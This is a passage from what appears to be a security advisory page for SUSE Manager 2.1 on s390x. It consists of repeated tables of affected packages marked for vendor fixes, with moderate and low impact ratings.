| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
low
